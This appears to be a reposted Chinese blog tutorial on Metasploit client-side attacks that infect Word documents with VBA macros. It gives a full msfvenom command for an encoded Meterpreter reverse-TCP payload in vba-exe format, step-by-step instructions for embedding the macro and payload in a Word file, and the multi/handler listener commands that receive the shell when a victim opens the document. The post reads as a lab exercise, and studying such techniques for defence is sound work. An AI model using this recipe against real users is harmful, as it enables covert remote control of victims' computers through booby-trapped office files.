zoukankan      html  css  js  c++  java
  • MSF——客户端渗透之VBScript感染

    弱点扫描

    根据信息收集的结果搜索漏洞利用模块

    结合外部漏洞扫描系统对大IP地址段进行批量扫描

    误报率、漏报率

    • VNC密码破解

    客户端渗透

    VBScript感染方式

    利用  宏  感染word、excel文档

    绕过某些基于文件类型检查的安全机制

    一般人对word、excel的格式看来是没有安全威胁的,没有防范

    生成Payload

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.171.129 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

    生成的内容分为两个部分,一部分是宏执行的VBA代码,另一部分是Payload

    生成一个空白的word文件

     

    宏名随便输入,然后点击创建,我们拷贝生成的第一部分的内容到这里,然后点击保存

    我们现在再打开  宏  ,可以看到生成了下面几个宏

    然后我们拷贝第二部分,贴到word文档的正文里面,然后保存关闭

    然后在Kali上启动侦听

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.171.129
    exploit

    当在Windows启动刚刚的word时,我们就取得shell了

  • 相关阅读:
    自定义异常
    异常的处理方式之二:声明异常(throws子句)
    异常的处理方式之一:捕获异常
    CheckedException已检查异常
    Range Sum Query
    cmd命令结束占用tomcat的进程
    原生js实现瀑布流
    js实现选项卡切换
    (转载)用ul做横向导航
    帝国CMS视频
  • 原文地址:https://www.cnblogs.com/dogecheng/p/11548046.html
Copyright © 2011-2022 走看看